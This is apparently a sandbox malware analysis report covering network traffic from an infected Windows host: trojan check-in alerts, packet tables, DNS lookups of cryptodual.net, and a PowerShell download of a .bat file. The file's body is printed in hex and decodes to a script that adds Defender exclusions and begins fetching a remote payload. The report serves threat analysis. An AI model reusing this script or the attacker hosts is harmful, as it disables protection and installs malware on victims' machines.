01/04/21-19:16:14.243232	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:14.373824	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:14.464342	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:20.188842	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:20.525208	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:20.604695	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:20.695407	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:25.821773	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:25.936414	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:26.045708	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:26.128198	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:31.236564	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:31.327786	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:31.416657	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:31.497657	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:36.587045	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:36.697040	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:36.783519	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:36.862987	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:41.952534	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:42.029712	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:42.119550	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:42.203074	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:47.290327	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:47.380898	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:47.467654	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:47.546960	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:52.639885	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:53.833966	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:53.917467	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:54.001650	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:59.101597	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:59.190733	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:59.283482	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:16:59.363204	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:03.754157	TCP	2022985	ET TROJAN Trojan Generic - POST To gate.php with no accept headers	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:03.754157	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:04.455587	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:04.552220	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:04.565768	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:04.643834	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:04.694197	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:04.724303	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:04.791112	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:04.889751	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:09.805415	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:09.893395	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:09.952816	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:10.015170	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:09.984305	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:10.070359	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:10.086372	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:10.155527	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:15.166876	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:15.225050	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:15.258449	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:15.296495	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:15.339893	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:15.367356	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:15.425207	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:15.429740	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:20.499826	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:20.524227	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:20.594126	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:20.608154	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:20.656460	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:20.719814	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:20.688240	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:20.781973	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:25.787288	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:25.871639	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:25.868453	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:25.932639	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:25.960122	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:25.994359	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:26.040878	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:26.131249	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:31.060841	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:31.131784	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:31.638737	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:31.630045	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:31.695957	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:31.733062	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:31.821298	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:31.899070	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:36.756045	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:36.836218	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:36.899525	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:36.965912	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:36.984596	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:37.065628	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:37.144451	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:37.227199	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:42.043808	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:42.135366	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:42.211040	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:42.274715	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:42.314454	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:42.754303	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:42.880933	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:42.963815	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49171	80	192.168.2.22	172.67.167.122
01/04/21-19:17:47.786000	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:47.858089	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:47.921656	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122
01/04/21-19:17:47.988914	TCP	2026071	ET TROJAN W32.FakeEzQ.kr Checkin	49172	80	192.168.2.22	172.67.167.122

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2021 19:15:31.115885019 CET	49167	443	192.168.2.22	172.67.8.238
Jan 4, 2021 19:15:31.155934095 CET	443	49167	172.67.8.238	192.168.2.22
Jan 4, 2021 19:15:31.156137943 CET	49167	443	192.168.2.22	172.67.8.238
Jan 4, 2021 19:15:31.180326939 CET	49167	443	192.168.2.22	172.67.8.238
Jan 4, 2021 19:15:31.220463991 CET	443	49167	172.67.8.238	192.168.2.22
Jan 4, 2021 19:15:31.228162050 CET	443	49167	172.67.8.238	192.168.2.22
Jan 4, 2021 19:15:31.228203058 CET	443	49167	172.67.8.238	192.168.2.22
Jan 4, 2021 19:15:31.228230953 CET	443	49167	172.67.8.238	192.168.2.22
Jan 4, 2021 19:15:31.228297949 CET	49167	443	192.168.2.22	172.67.8.238
Jan 4, 2021 19:15:31.243199110 CET	49167	443	192.168.2.22	172.67.8.238
Jan 4, 2021 19:15:31.283288956 CET	443	49167	172.67.8.238	192.168.2.22
Jan 4, 2021 19:15:31.283541918 CET	443	49167	172.67.8.238	192.168.2.22
Jan 4, 2021 19:15:31.488832951 CET	49167	443	192.168.2.22	172.67.8.238
Jan 4, 2021 19:15:33.257802010 CET	49167	443	192.168.2.22	172.67.8.238
Jan 4, 2021 19:15:33.297856092 CET	443	49167	172.67.8.238	192.168.2.22
Jan 4, 2021 19:15:33.378052950 CET	443	49167	172.67.8.238	192.168.2.22
Jan 4, 2021 19:15:33.378097057 CET	443	49167	172.67.8.238	192.168.2.22
Jan 4, 2021 19:15:33.378283024 CET	49167	443	192.168.2.22	172.67.8.238
Jan 4, 2021 19:15:33.382728100 CET	49169	80	192.168.2.22	37.46.150.139
Jan 4, 2021 19:15:33.429598093 CET	80	49169	37.46.150.139	192.168.2.22
Jan 4, 2021 19:15:33.429721117 CET	49169	80	192.168.2.22	37.46.150.139
Jan 4, 2021 19:15:33.429898024 CET	49169	80	192.168.2.22	37.46.150.139
Jan 4, 2021 19:15:33.482979059 CET	80	49169	37.46.150.139	192.168.2.22
Jan 4, 2021 19:15:33.483009100 CET	80	49169	37.46.150.139	192.168.2.22
Jan 4, 2021 19:15:33.483181000 CET	49169	80	192.168.2.22	37.46.150.139
Jan 4, 2021 19:15:33.541407108 CET	49169	80	192.168.2.22	37.46.150.139
Jan 4, 2021 19:15:33.541671038 CET	49167	443	192.168.2.22	172.67.8.238
Jan 4, 2021 19:15:41.484987974 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:41.530745983 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:41.530858994 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:41.538939953 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:41.584742069 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:41.591833115 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:41.591857910 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:41.591944933 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:41.601109028 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:41.646836042 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:41.646967888 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:41.848054886 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:41.943974018 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:41.989763021 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029306889 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029329062 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029340982 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029347897 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029359102 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029372931 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029434919 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029458046 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029464006 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.029474974 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029486895 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029494047 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029512882 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029531956 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.029535055 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029546976 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029555082 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029607058 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.029623985 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029656887 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029673100 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029687881 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029689074 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.029696941 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.029736996 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.029814959 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.029906988 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.029989004 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030033112 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030050039 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030066013 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030083895 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030101061 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030114889 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030121088 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.030128002 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030138969 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030165911 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.030204058 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.030478001 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030517101 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030534983 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030550957 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030566931 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030582905 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030599117 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030612946 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.030639887 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.030693054 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.030976057 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.031013966 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.031042099 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.031059980 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.031091928 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.031096935 CET	49170	443	192.168.2.22	172.67.167.122
Jan 4, 2021 19:15:42.031106949 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.031121969 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.031133890 CET	443	49170	172.67.167.122	192.168.2.22
Jan 4, 2021 19:15:42.031140089 CET	49170	443	192.168.2.22	172.67.167.122

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2021 19:15:31.045967102 CET	52197	53	192.168.2.22	8.8.8.8
Jan 4, 2021 19:15:31.102055073 CET	53	52197	8.8.8.8	192.168.2.22
Jan 4, 2021 19:15:31.700972080 CET	53099	53	192.168.2.22	8.8.8.8
Jan 4, 2021 19:15:31.749100924 CET	53	53099	8.8.8.8	192.168.2.22
Jan 4, 2021 19:15:31.758227110 CET	52838	53	192.168.2.22	8.8.8.8
Jan 4, 2021 19:15:31.806416988 CET	53	52838	8.8.8.8	192.168.2.22
Jan 4, 2021 19:15:41.397423029 CET	61200	53	192.168.2.22	8.8.8.8
Jan 4, 2021 19:15:41.475958109 CET	53	61200	8.8.8.8	192.168.2.22
Jan 4, 2021 19:16:01.753098011 CET	49548	53	192.168.2.22	8.8.8.8
Jan 4, 2021 19:16:01.801085949 CET	53	49548	8.8.8.8	192.168.2.22
Jan 4, 2021 19:17:03.633133888 CET	55627	53	192.168.2.22	8.8.8.8
Jan 4, 2021 19:17:03.703593016 CET	53	55627	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 4, 2021 19:15:31.045967102 CET	192.168.2.22	8.8.8.8	0x5ccc	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
Jan 4, 2021 19:15:41.397423029 CET	192.168.2.22	8.8.8.8	0x44f5	Standard query (0)	cryptodual.net	A (IP address)	IN (0x0001)
Jan 4, 2021 19:16:01.753098011 CET	192.168.2.22	8.8.8.8	0x155d	Standard query (0)	cryptodual.net	A (IP address)	IN (0x0001)
Jan 4, 2021 19:17:03.633133888 CET	192.168.2.22	8.8.8.8	0xba01	Standard query (0)	cryptodual.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 4, 2021 19:15:31.102055073 CET	8.8.8.8	192.168.2.22	0x5ccc	No error (0)	cutt.ly	172.67.8.238	A (IP address)	IN (0x0001)
Jan 4, 2021 19:15:31.102055073 CET	8.8.8.8	192.168.2.22	0x5ccc	No error (0)	cutt.ly	104.22.0.232	A (IP address)	IN (0x0001)
Jan 4, 2021 19:15:31.102055073 CET	8.8.8.8	192.168.2.22	0x5ccc	No error (0)	cutt.ly	104.22.1.232	A (IP address)	IN (0x0001)
Jan 4, 2021 19:15:41.475958109 CET	8.8.8.8	192.168.2.22	0x44f5	No error (0)	cryptodual.net	172.67.167.122	A (IP address)	IN (0x0001)
Jan 4, 2021 19:15:41.475958109 CET	8.8.8.8	192.168.2.22	0x44f5	No error (0)	cryptodual.net	104.27.187.220	A (IP address)	IN (0x0001)
Jan 4, 2021 19:15:41.475958109 CET	8.8.8.8	192.168.2.22	0x44f5	No error (0)	cryptodual.net	104.27.186.220	A (IP address)	IN (0x0001)
Jan 4, 2021 19:16:01.801085949 CET	8.8.8.8	192.168.2.22	0x155d	No error (0)	cryptodual.net	172.67.167.122	A (IP address)	IN (0x0001)
Jan 4, 2021 19:16:01.801085949 CET	8.8.8.8	192.168.2.22	0x155d	No error (0)	cryptodual.net	104.27.187.220	A (IP address)	IN (0x0001)
Jan 4, 2021 19:16:01.801085949 CET	8.8.8.8	192.168.2.22	0x155d	No error (0)	cryptodual.net	104.27.186.220	A (IP address)	IN (0x0001)
Jan 4, 2021 19:17:03.703593016 CET	8.8.8.8	192.168.2.22	0xba01	No error (0)	cryptodual.net	172.67.167.122	A (IP address)	IN (0x0001)
Jan 4, 2021 19:17:03.703593016 CET	8.8.8.8	192.168.2.22	0xba01	No error (0)	cryptodual.net	104.27.186.220	A (IP address)	IN (0x0001)
Jan 4, 2021 19:17:03.703593016 CET	8.8.8.8	192.168.2.22	0xba01	No error (0)	cryptodual.net	104.27.187.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

37.46.150.139

cryptodual.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49169	37.46.150.139	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 4, 2021 19:15:33.429898024 CET	70	OUT	GET /bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat HTTP/1.1 Host: 37.46.150.139 Connection: Keep-Alive
Jan 4, 2021 19:15:33.482979059 CET	72	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:15:33 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.12 Last-Modified: Mon, 04 Jan 2021 15:32:06 GMT ETag: "7e4-5b814caeb9285" Accept-Ranges: bytes Content-Length: 2020 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 6d 6f 64 65 20 31 38 2c 31 0d 0a 63 6f 6c 6f 72 20 46 45 0d 0a 73 65 74 6c 6f 63 61 6c 0d 0a 66 6f 72 20 2f 66 20 22 74 6f 6b 65 6e 73 3d 34 2d 35 20 64 65 6c 69 6d 73 3d 2e 20 22 20 25 25 69 20 69 6e 20 28 27 76 65 72 27 29 20 64 6f 20 73 65 74 20 56 45 52 53 49 4f 4e 3d 25 25 69 2e 25 25 6a 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 31 30 2e 30 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 31 30 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 74 65 6d 70 22 20 3b 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 61 70 70 64 61 74 61 22 20 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 